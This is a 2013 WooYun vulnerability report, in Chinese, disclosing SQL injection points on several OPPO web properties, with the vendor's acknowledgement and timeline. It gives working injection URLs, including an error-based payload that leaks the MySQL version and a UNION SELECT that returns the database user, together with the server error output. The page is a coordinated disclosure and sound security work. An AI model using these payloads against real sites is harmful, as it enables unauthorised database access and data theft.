当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019676

漏洞标题:OPPO注入漏洞大礼包,数据库信息泄露

相关厂商:广东欧珀移动通讯有限公司

漏洞作者: kobin97

提交时间:2013-03-07 14:47

修复时间:2013-04-21 14:48

公开时间:2013-04-21 14:48

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-07: 细节已通知厂商并且等待厂商处理中
2013-03-07: 厂商已经确认,细节仅向厂商公开
2013-03-17: 细节向核心白帽子及相关领域专家公开
2013-03-27: 细节向普通白帽子公开
2013-04-06: 细节向实习白帽子公开
2013-04-21: 细节向公众公开

简要描述:

OPPO注入礼包

详细说明:

注入点1:
http://www.oppo.com/?q=software&d=ASCx
order by 类型注入
http://www.oppo.com/?q=software&d=ASC,%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20%28Select%20version%28%29%29%20from%20information_schema.tables%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29
error number: 1062; error message: Duplicate entry '|5.5.19-log|1' for key 'group_key'

oppo.png


注入点2:
http://union.oppo.com/?act=u_itemlist&queryinput=sdfsf%27fs
注入点3:
http://union.oppo.com/?act=u_example_more&itemid=862%27
注入点4:
http://www.oppo.com/index.php?q=mp3/product/detail&name=X7%27
Zandy_Mysql error
The query result is false.
error number: 1064; error message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' LIMIT 1' at line 1
SQL: SELECT * FROM oppo_mp3 WHERE 1 AND name='X7'' AND status='1' LIMIT 1
注入点5:
http://theme.oppo.com/?q=index/list&model=A209&sortby=downloads%20asc
http://theme.oppo.com/?q=index/moreRecom&model=A209&sortby=downloads&order=DESC
这两个都是order by 类型注入
注入点6:
http://www.oppo.com/?q=interface/editor&name=x905%27&fid=209
http://www.oppo.com/?q=interface/editor&name=x905%27%20and%201=2%20union%20select%201,user%28%29,3%23&fid=209
"title":"[email protected]"
就暂时这么多吧。。

漏洞证明:

上面已经证明

修复方案:

过虑,转换

版权声明:转载请注明来源 kobin97@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-03-07 17:11

厂商回复:

谢谢对OPPO的关注,部分已废弃网站尽快停用,有问题网站我们尽快修正。

最新状态:

暂无